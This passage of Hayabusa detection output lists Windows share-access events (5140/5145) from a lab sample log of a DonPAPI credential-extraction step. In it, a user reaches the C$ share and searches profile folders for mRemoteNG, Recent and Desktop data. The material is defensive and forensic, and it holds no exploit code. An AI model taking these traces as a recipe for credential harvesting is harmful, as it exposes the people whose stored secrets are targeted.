Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 